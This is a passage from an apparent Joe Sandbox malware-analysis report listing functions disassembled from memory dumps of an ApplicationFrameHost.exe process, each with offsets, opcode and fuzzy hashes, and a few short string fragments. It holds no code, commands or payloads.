Function 00007FF848F31BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb2c88744ca614cbcfa84712899ed73f86aedc375580a5188e613f75f4fc0db
Instruction ID: 9d92ffd845466564e9df55d1015602f1ccc055249ae4c20265ad4a7d188c22df
Opcode Fuzzy Hash: efb2c88744ca614cbcfa84712899ed73f86aedc375580a5188e613f75f4fc0db
Instruction Fuzzy Hash: 1101A97080D68E8FEB99EF2484592BA7BA0FF55341F4400BAE808C21D2DB359490CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: f2ced088bb4b8455868c33316bc232a012c51a293a437404177c0b8834d5319c
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 4901C871D0960ACFDB18EF85D4A06EDB7B1EF48361F24002ED51AA32D0CB386991CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3e78de93a49f9dbfec705544cf21b5478c36ab370c37e7bac5aecd7fa7258f
Instruction ID: d825a827078a7b82fee697043566e1482f86e00a3aafb1df26aaa5d98bf915dc
Opcode Fuzzy Hash: 9e3e78de93a49f9dbfec705544cf21b5478c36ab370c37e7bac5aecd7fa7258f
Instruction Fuzzy Hash: 43F0CD3080E64E8FEB89EF2494052FA77A4FF15389F10053AF80DC21C1DB39A5A0CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c24f6404a8ca3c8eb6fbac3f3988caf943678a1b99fa2aa0d0c0f6ec30d34b4
Instruction ID: 3c3b91b5d70c87b774a4242221fedb4749714ea97a6e6f04367e90ad2d833580
Opcode Fuzzy Hash: 7c24f6404a8ca3c8eb6fbac3f3988caf943678a1b99fa2aa0d0c0f6ec30d34b4
Instruction Fuzzy Hash: F0F0623180E78A8FEB5AAF6488592A93BA1FF16342F4505BBD409C61D2DB38A454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f47000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68e19049f48015d1fdf5a74a7313ec6d3c9b7cfced8bc1876275574739e4a05
Instruction ID: 5d367e47852aa90918eac92f8324344bd8d4bd645b6db47f060998501f26783e
Opcode Fuzzy Hash: b68e19049f48015d1fdf5a74a7313ec6d3c9b7cfced8bc1876275574739e4a05
Instruction Fuzzy Hash: 9AF03A31E0851D8BDB18EB98E8918FDB7B5FFA8650F50013AD109B3282CF246A058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F327CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc72848ab4593ab206cce85c48b54c05b21f50b94efdaa6540eee21d1ca22e4
Instruction ID: 644eb476d63020a6b26b62358cfe7543733b70233512bca883901d877207208d
Opcode Fuzzy Hash: 6bc72848ab4593ab206cce85c48b54c05b21f50b94efdaa6540eee21d1ca22e4
Instruction Fuzzy Hash: 5EF0BE7080E78E8FEB59AF6488292B97BA0FF15346F4505BFE809C60D2EB399454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 5bc7c4da91ff6c26ad301ba0e77786e6d619d87ea03a1c8e7e788281d9814829
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 90E0ED30E1D9068EEA647328848567471D59F44394FB88776F01CCA1E5EB2DECC6D609

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: 2832567355cb9dce1c978f6e21db8d2c54ce3da714f24b4ba47fdd066b00880a
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 21D0E235A1892D8ECF40EB98D8441ECB3B4FB58340F000022D40DD7280CB2068108B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F351AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: c1d9cc1d6f359149bdcb91d6d0ce9ca71c99aad859e6254a91b6e80a4aaa0493
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: 95E02670D19A1D8EEBF5EB088C50BB9B6B1BB58642F5000EBC00DE2280DF342AC09F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70367b2b6ef51d3d61b644d43846e52a1385d726f03513c09bcdc274b1dec3e7
Instruction ID: 2022ee7184206e1fc363b501f972d3f04417e49ca5f3d4decea4cf7b90d6e0b3
Opcode Fuzzy Hash: 70367b2b6ef51d3d61b644d43846e52a1385d726f03513c09bcdc274b1dec3e7
Instruction Fuzzy Hash: DED05E30C1D54A9EDB91F710C851AE9B7B0EF15340F1042E3800DC2282CF38AAC08F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F38EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: d7798922c64e1049268846843d25c10c71a04ff2289e4e58ff5047e35b16cc1b
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: 45D06C70A09A298EEBA4EB0488547AAB261FB48242F1005EB840DE72D1EF742A808F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30FB1 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e39560c43125ccf3527922f911fe34b0242be202c98522324015f8d1f291eb
Instruction ID: b265842b7d8a28f5ec441450b671760bf333bc7fe3d66c85ebec05528e2c8fdd
Opcode Fuzzy Hash: 03e39560c43125ccf3527922f911fe34b0242be202c98522324015f8d1f291eb
Instruction Fuzzy Hash: 8AD09E3090E4198FE754F714C840BAE6A71AF84344F500166D409A3285CE396D418F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F41001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

{, xrefs: 00007FF848F41001
/, xrefs: 00007FF848F41870
&, xrefs: 00007FF848F41A12
", xrefs: 00007FF848F41A67
", xrefs: 00007FF848F4129E
[, xrefs: 00007FF848F412E4

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: a5b54852b088992f98e88108acdc8ef2438739d9b6af1783b65c1c495fa9e745
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: 6A51C570D082298FEB68EF95D8947FDB6B1AF54745F1040BAD05EA72C1CB385984DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3CF39 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

D#, xrefs: 00007FF848F3CFA0
\#, xrefs: 00007FF848F3D00F
L#, xrefs: 00007FF848F3CFC5
6#, xrefs: 00007FF848F3CF56
T#, xrefs: 00007FF848F3CFEA
<#, xrefs: 00007FF848F3CF7B

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: 6#$<#$D#$L#$T#$\#
API String ID: 0-300081556
Opcode ID: dc8729febe8c1ecb59aae4b60af6008c36917212de1c032f0145dbce298adc65
Instruction ID: 021df548f8d951d48cf05ce7b8baf31e6bcf30cec25d96e3a48e62e6d8391e30
Opcode Fuzzy Hash: dc8729febe8c1ecb59aae4b60af6008c36917212de1c032f0145dbce298adc65
Instruction Fuzzy Hash: 05411870E196099FEB44FBA8C4556EEBBB2FF58340F10413AD009E7292DF3C69458B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F41870
&, xrefs: 00007FF848F41A12
}, xrefs: 00007FF848F419DF
", xrefs: 00007FF848F41A67

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 841c9695c48c9098fe46eab5e093ce06d607ca991424aca0264536a6107f800c
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: E831B074D182298FDBA8EF54C8947BDB7B1FB64741F1045AAD04AA72D0DB386A84CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ApplicationFrameHost.exePID: 5612, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 22233ae34998f81fbca723e06180caa35db11864377c1ec2125a7d5f5ac34ad5
Instruction ID: 35141eef00aa5527caea407ef2f1cede23a36caf689781168f9844209eda8734
Opcode Fuzzy Hash: 22233ae34998f81fbca723e06180caa35db11864377c1ec2125a7d5f5ac34ad5
Instruction Fuzzy Hash: 7B115B31D1894E9EE780FB68C8491BA7BE0FFA8780F4005B6D818E6192EF78A5448740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction ID: 0f8906c84f54b0f665b2d43f7cafa5738e7939d1f09745441ff8c20e2e2bd6c0
Opcode Fuzzy Hash: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction Fuzzy Hash: 0311BF71D0CA5A4EEB59EB6488692B97BE0FFA5341F1504BFC40AE60D2EB286580C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F411A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction ID: eaf0ac8958caa7dd5a940d5518fc474c1f4ed7a310d7c0165deb44609fa475b4
Opcode Fuzzy Hash: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction Fuzzy Hash: E1F0C870D1CA6E4DFB54BB6498193F97AE4FFA5745F00143BD41AD20C1FF3415948644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F416A8 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd2d12c5dc6b6761fafee7d03c297fea54a956406cf5bc5e3361132a904c741
Instruction ID: 99bde78aa04304ed55a1f879e33952cb3d75c1dae3404bbe93229062bf8080a6
Opcode Fuzzy Hash: 3dd2d12c5dc6b6761fafee7d03c297fea54a956406cf5bc5e3361132a904c741
Instruction Fuzzy Hash: 6D91BE31A0CA5A8FDB58EF1898556B977E2FFA8B44F14017AD44DD32C2CE34AC42C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F435FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baafd64196cca0252b1a0f6724737a30b5f142e1dc2b9f875601be09218cb88a
Instruction ID: f6c171b1621f585cb617bc47eae5230d3c99111b6bee312291493f6df352f6e7
Opcode Fuzzy Hash: baafd64196cca0252b1a0f6724737a30b5f142e1dc2b9f875601be09218cb88a
Instruction Fuzzy Hash: 8571AC31D1D94A9FE784EB2CE8557AABBF1FB99350F50027AC00DD32C6DBB828058B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cac1e004e90a54c1d75998a2a7fd1d034dea2ccbb76dada769255ffccdb270
Instruction ID: 7e04ed1c89684be885447db59f006f0371867efaac9d63d0f34d0155f1990f33
Opcode Fuzzy Hash: d9cac1e004e90a54c1d75998a2a7fd1d034dea2ccbb76dada769255ffccdb270
Instruction Fuzzy Hash: 8351C131A0CA9A4FDB48EF1888545BA77E2FFA8B54F14017ED45AD32C2CF35E8428785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F431C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa3e16d16cc28d7b93295a63118f654683555088a8333d1035dfcfa53a23b5f
Instruction ID: 9d9a24c697a967bedab0fb3bebb3d88775d5357af67b7e0589925f3434eff806
Opcode Fuzzy Hash: ffa3e16d16cc28d7b93295a63118f654683555088a8333d1035dfcfa53a23b5f
Instruction Fuzzy Hash: BB511670D0861D8EEB54EBA8D458AFDBBF1EF68750F10407AD009E72D2DB38A944CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42085 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a02c1595f5a938e85f4fec39a62ced5ed7b12ed28fc24cf13980cfcc6b4e968
Instruction ID: 4ff2c7173abd04efde3ebcdf966ca84c8b9440af412520d61f6874874b2fa16a
Opcode Fuzzy Hash: 6a02c1595f5a938e85f4fec39a62ced5ed7b12ed28fc24cf13980cfcc6b4e968
Instruction Fuzzy Hash: F1412331E0DA4A4FE345EBB898491B8BBE1EF96790F0544BBD04DD71D3EF28A8428355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F432F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2356033367adaad5656901f6581d9c2efdf40e146e0de99389ef6571db8b5ff1
Instruction ID: 6e349270f07b3cee97904f0ab28d49d73b61795ecb73d65d24e8cc9ab9459e3b
Opcode Fuzzy Hash: 2356033367adaad5656901f6581d9c2efdf40e146e0de99389ef6571db8b5ff1
Instruction Fuzzy Hash: E221C070D0891D8FEB94EB98C494AECBBF1FF68741F50417AD009E7292DB386981DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F433CF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction ID: 382c1169bc744024b04c30840ebd18a0d448f8a9fd3a09f000dd0eef495f86a8
Opcode Fuzzy Hash: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction Fuzzy Hash: 04216A3084D68A9FE743AB788858AA97FF0EF26340F0905FBD049C70B2EB389455C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8592361078ccb59de252aacd4e89b3fad8a45246767e440b0337da58cf118530
Instruction ID: 6504e29276991f6fdc1b5234a14f2f811dd8200722c6e377639624fa6d1f812a
Opcode Fuzzy Hash: 8592361078ccb59de252aacd4e89b3fad8a45246767e440b0337da58cf118530
Instruction Fuzzy Hash: 8611702184E2D14EEB23677818651616FD48F23674F2D46FBD0D8EB0E3D70D588AC316

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction ID: 9a06960a479f61a1c9c6059ecb5053a100b3d3bdbb322c4a6b6aac10fb393958
Opcode Fuzzy Hash: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction Fuzzy Hash: F101003190C68E9EE782FB7889885A87BE0EFA5740F2504B3D808D60D3EA24A4458294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction ID: 36f05732870444f6a767fd4826c6d250bcda658b16ee6740f071c4f089c58591
Opcode Fuzzy Hash: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction Fuzzy Hash: 6411917090D98B8EEB59AB28C519AB977A0FF29745F0408BEC00EE30D2DF3964018B18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F434F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction ID: bd0b574fcadcf63dfd28259c0e0e1eeb4b84c71f1921263e9547c3895a45c931
Opcode Fuzzy Hash: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction Fuzzy Hash: 6A115E7091C68E8FDB59EF688459ABD7BA0FF28701F4404BFD419D61D1DB35A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction ID: 39b7b6a333df80e789d2972c8317a967f06798215ccf8776e64201fefbe87986
Opcode Fuzzy Hash: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction Fuzzy Hash: 54017830D0D68E8FE751FBA888486A97BE0EF69741F0508B7D40CD71E2EB38E4448704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction ID: dcc513c825db2bbd0fe3fb518d8d6dd7d6c010302c176580c203d6826ad00882
Opcode Fuzzy Hash: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction Fuzzy Hash: 3C019E3090851E8FEB48EF24C4596FA77A1FF68345F10047ED40ED21D1CB35A5A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction ID: ddf848f43f2e9c0337686f97f9af5b7a1739ed0627013854cd124387e17e58e2
Opcode Fuzzy Hash: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction Fuzzy Hash: 6F01783085D64E8FE795BBA488886A97BE0EF69741F5505B7D808D60A2EB38E0848704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
Instruction ID: ad19472d6d264e79e2db892d39285c6c94b4615638b1322728a78ef147a402b4
Opcode Fuzzy Hash: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
